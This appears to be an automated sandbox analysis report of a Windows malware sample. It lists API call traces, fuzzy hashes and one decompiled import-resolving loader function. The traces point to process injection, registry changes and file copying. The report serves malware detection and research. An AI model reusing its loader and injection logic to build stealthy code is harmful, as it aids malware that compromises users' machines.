  • Opcode Fuzzy Hash: 76018E064AAA7143C6022C158545FBAF186EB03FB9C5CF710D560304CE0B4574E1F669
  • Instruction Fuzzy Hash: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
APIs
  • memset.NTDLL ref: 001DC393
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
    • Part of subcall function 001D90C0: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D90ED
    • Part of subcall function 001D90C0: SetLastError.KERNEL32(00000000,?,001DC3F5,00000000,?,00010007,00000004,?), ref: 001D90F4
  • ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
  • SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
    • Part of subcall function 001DC212: memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC212: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
    • Part of subcall function 001DC212: WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
    • Part of subcall function 001DC212: SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
  • ResumeThread.KERNEL32(00000004), ref: 001DC4D6
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 51
  • API ID: CreateFileGetLastErrorHeapFreeRegCloseKeyRegOpenKey
  • String ID: [FILE]$[FILE]
  • API String ID: 3351174444-3230400787
  • Opcode ID: 033c4394e70e99a6bf63e685e4473468f8b4c093a00da4e8f42c8e7bfe120adf
  • Instruction ID: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
  • Opcode Fuzzy Hash: 85F0DD3A594EC3CFD423249020157BAC805FB412E2CAD2716EA807E1C16F8333192F17
  • Instruction Fuzzy Hash: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C39AA
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D95E9: lstrlenW.KERNEL32(?,00000000,001EAC80,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D95F5
    • Part of subcall function 001D95E9: memcpy.NTDLL(00000000,?,00000000,00000002,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D961D
    • Part of subcall function 001D95E9: memset.NTDLL ref: 001D962F
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C3A90
  • GetLastError.KERNEL32 ref: 001C3A9B
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C3AB0
  • RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 001C3AC1
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 193527b1eef174f7d3812915e618651906c6adafd0bce5f2d714c946695c6d1b
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: A7F02E4D155F71CAE17D2005187BBAA70C3F39671BD25E9031552B31076991B3292FCC
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44);
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}

APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,004015E0,?), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,004015E0,?), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,004015E0,?), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Similarity
  • Total matches: 31
  • API ID: CreateDirectory$CopyFileHeapFreeRtlAllocateHeaplstrcpy
  • String ID: \sols
  • API String ID: 2898405644-25449109
  • Opcode ID: 5497166955076156837619a2a098418b7cb76563a9d137fec855e451e2c56df1
  • Instruction ID: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
  • Opcode Fuzzy Hash: F2E0ABB50504208B9013D4B671183389C4698102F219D4511FB06BC48FAFD302A5FB6E
  • Instruction Fuzzy Hash: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
  • lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
  • CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 80
  • API ID: GetLastError$CloseHandleDuplicateHandleOpenProcessRegCloseKeyRegCreateKeyRegOpenKey
  • String ID:
  • API String ID: 3239362136-0
  • Opcode ID: 43d6ef705f251b34ef39b149b3ea3bd8fb900b51b25fecf4a76b54cbc8c7a116
  • Instruction ID: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
  • Opcode Fuzzy Hash: 4CD0C2B8000985CF04479878487AAFFEA01BEC21C155C5A72F9C06824F769172DF0B6B
  • Instruction Fuzzy Hash: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
APIs
  • OpenProcess.KERNEL32(00000040,00000000,?), ref: 001C2802
  • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 001C2820
  • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 001C2828
  • DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 001C2846
  • GetLastError.KERNEL32 ref: 001C285A
  • RegCloseKey.ADVAPI32(?), ref: 001C2865
  • CloseHandle.KERNEL32(00000000), ref: 001C286C
  • GetLastError.KERNEL32 ref: 001C2874
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionSleepmemset
  • String ID:
  • API String ID: 2472442912-0
  • Opcode ID: dc49271e526c1696018041de0017b0827111101275221657691e75393d626545
  • Instruction ID: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
  • Opcode Fuzzy Hash: AA11AD32257B7013C12B648249A877EFA85F7420DBC8C7610FAA43906D1F4792D05F7A
  • Instruction Fuzzy Hash: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
APIs
  • RtlAllocateHeap.NTDLL ref: 001CDD25
  • memset.NTDLL ref: 001CDD39
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetCurrentThreadId.KERNEL32(?,00001000,00001000,?), ref: 001CDDC8
  • GetCurrentThread.KERNEL32 ref: 001CDDDB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CDE7E
  • Sleep.KERNEL32(0000000A), ref: 001CDE88
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CDEAE
    • Part of subcall function 001CDCA5: NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
    • Part of subcall function 001CDCA5: RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
    • Part of subcall function 001CDCA5: HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: HeapFree$RegCloseKeyRegCreateKey
  • String ID:
  • API String ID: 3276616890-0
  • Opcode ID: b82f1d124a686c0fba74e06d606f12bbe42e9b5bf24afcb4d9ffa1ad41822641
  • Instruction ID: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
  • Opcode Fuzzy Hash: 4A118C6A048DC253C06778C5B1BB7F5C412BB82CD0C4D1363FEA46D65C6E8372D66B02
  • Instruction Fuzzy Hash: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
APIs
  • RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
  • HeapFree.KERNEL32(00000000,?), ref: 001C9E08
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C947B: lstrlen.KERNEL32(?,001E5048,00000000), ref: 001C94A0
    • Part of subcall function 001C947B: wsprintfA.USER32 ref: 001C94E0
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9514
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C954D
    • Part of subcall function 001C947B: memcpy.NTDLL(?,001EB23B,-000000FA), ref: 001C95B0
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,?,001EB240), ref: 001C95FF
    • Part of subcall function 001C947B: memcpy.NTDLL(?,?,00000000), ref: 001C9619
    • Part of subcall function 001C947B: memcpy.NTDLL(?,00000000,001CAB3A), ref: 001C9638
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C964E
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9672
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C96B4
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C96D3
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,00000008,-000000F7,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C96F2
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000003B), ref: 001C9708
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000001,00000000,?), ref: 001C971D
    • Part of subcall function 001C947B: memmove.NTDLL(00000000,00000000,001CAB3A,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C9742
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C978D
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C97A9
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048), ref: 001C97C8
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000002C), ref: 001C97DB
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001C97F4
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(?,001E53C4), ref: 001C9802
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 001C9811
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001C982C
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,?,?,?,?,?,?,?,?,?,?,?,001EC448,?), ref: 001C9860
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C98AC
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C98C8
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,?,?,?,?,001EC448), ref: 001C98E7
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,00000000,00000001), ref: 001C992A
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9976
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C9992
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB23B,-00000006), ref: 001C99B1
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A), ref: 001C99E6
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9A25
  • HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: StrTrim$_struprlstrlenmemcpymemset
  • String ID:
  • API String ID: 2209883122-0
  • Opcode ID: 64815d0257e3aa2b83c4ddbe6b14a35168a99daac82a04345423b0ec2bb7509c
  • Instruction ID: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
  • Opcode Fuzzy Hash: E3018E5665E5F0D1C122289F4818335F842EF806EF719BA259C637068EBE0342607FE9
  • Instruction Fuzzy Hash: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D96C0
  • StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
  • _strupr.NTDLL ref: 001D9747
  • StrTrimA.SHLWAPI(?,?), ref: 001D9754
  • StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001C1314: RtlReAllocateHeap.NTDLL(00000000,?,?,001D9773), ref: 001C1324
  • memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 48
  • API ID: memcpy$HeapFreeRtlAllocateHeapRtlReAllocateHeap
  • String ID: W
  • API String ID: 1276199752-655174618
  • Opcode ID: f18a74b07f9afbff4fbb1da3eaf88715fd0ddee12a97bcb20455e5be1c2ad612
  • Instruction ID: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
  • Opcode Fuzzy Hash: 03016D10445B8247C55B60824161F6FE349BF40299C8DFB729DA8A55DA0F8133165B1F
  • Instruction Fuzzy Hash: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
  • RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9AD3: memcpy.NTDLL(00000000,001C9CB4,00000000,?,?,?,001C9CB4,00000000,?,?,8B50F445,001CAB3A), ref: 001C9B11
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,8B50F445,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9B97
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A), ref: 001C9BCE
    • Part of subcall function 001C9AD3: LocalFree.KERNEL32(001CAB3A,?,?,?,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?), ref: 001C9BDC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
  • memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: HeapFree$RtlImageNtHeaderStrChrStrTrimlstrlen
  • String ID:
  • API String ID: 3913414161-0
  • Opcode ID: 64ffad91cf0a2c2a078577b4f201d2562d86aecfc72bb8ed0596f04317282702
  • Instruction ID: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
  • Opcode Fuzzy Hash: 0401CB24280D82C289019CEE845C63AE54AFB033E290D75B2D7523C00E7B437AF7EF09
  • Instruction Fuzzy Hash: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • StrChrA.SHLWAPI(00000000,00000020), ref: 001CDB7A
  • StrTrimA.SHLWAPI(00000000,001E53CC), ref: 001CDB90
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • RtlImageNtHeader.NTDLL(?), ref: 001CDBB8
  • HeapFree.KERNEL32(00000000,?), ref: 001CDBDF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • lstrlen.KERNEL32(00000000,00000000,?), ref: 001CDC47
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CDC76
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CDC94
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: CreateEventCreateMutexCreateThreadGetLastErrorRtlInitializeCriticalSectionmemcpymemset
  • String ID:
  • API String ID: 850450842-0
  • Opcode ID: 16ca8f20d85ab577bbc2653173ab980685e792abd2a2311232cd2963c8cd0ec7
  • Instruction ID: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
  • Opcode Fuzzy Hash: EDF0DDF30A4E85BBE423A12250A13BA0A03B74A2CEF8D3510FBB5640590F6072E26D45
  • Instruction Fuzzy Hash: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
APIs
  • memset.NTDLL ref: 001DB75F
  • memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
  • RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
  • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
  • CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
  • GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 43
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleeplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 2790639078-0
  • Opcode ID: 1766a587401683fdb30044bc6672b38e50223d8055563f5057ad240d85219721
  • Instruction ID: f742db94e7bccdeb672c9316879cf6e869411e6e683690c3bbd30f2f23ea435e
  • Opcode Fuzzy Hash: 5301CB70045D41C7DA7730898822B75C948FF5A3F1C0D6F71ED127468A6F83719AEA4E
